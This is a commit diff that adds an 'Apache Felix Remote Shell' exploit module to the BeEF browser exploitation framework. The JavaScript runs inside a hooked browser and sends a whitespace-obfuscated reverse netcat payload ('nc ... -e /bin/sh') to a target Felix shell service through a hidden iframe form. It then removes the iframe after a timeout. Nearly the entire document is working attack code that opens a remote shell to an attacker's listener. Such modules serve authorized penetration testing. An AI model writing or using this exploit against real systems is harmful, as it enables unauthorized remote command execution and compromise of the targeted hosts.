Add Apache Felix Remote Shell module

2015-01-01 21:16:56 +00:00
parent 3944477b29
commit a9833fd538
3 changed files with 90 additions and 0 deletions
--- a/modules/exploits/apache_felix_remote_shell/command.js
+++ b/modules/exploits/apache_felix_remote_shell/command.js
@@ -0,0 +1,51 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var payload_name = 'reverse_netcat';
+  var timeout = 15;
+  var peer = rhost + ':' + rport;
+
+  cleanup = function() {
+    try {
+      document.body.removeChild(felix_exec_iframe_<%= @command_id %>);
+    } catch(e) {
+      beef.debug("Could not remove iframe: " + e.message);
+    }
+  }
+  setTimeout("cleanup()", timeout*1000);
+
+  payload = function() {
+    var whitespace = '';
+    for (var i=0; i<Math.floor(Math.random()*10)+3; i++) whitespace += ' ';
+    var payload = '';
+    switch (payload_name) {
+      default: // "reverse_netcat":
+        payload = 'exec "/bin/nc ' + lhost + ' ' + lport + ' -e /bin/sh" ';
+        payload = payload.replace(/ /g, whitespace);
+        break;
+    }
+    return payload
+  }
+
+  exploit = function() {
+    var code = payload();
+    beef.debug(peer + " - Sending payload (" + code.length + " bytes)");
+    var felix_exec_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/", code);
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+  }
+
+  try {
+    exploit();
+  } catch(e) {
+    beef.debug(peer + " - Exploit failed: " + e.message);
+  }
+
+});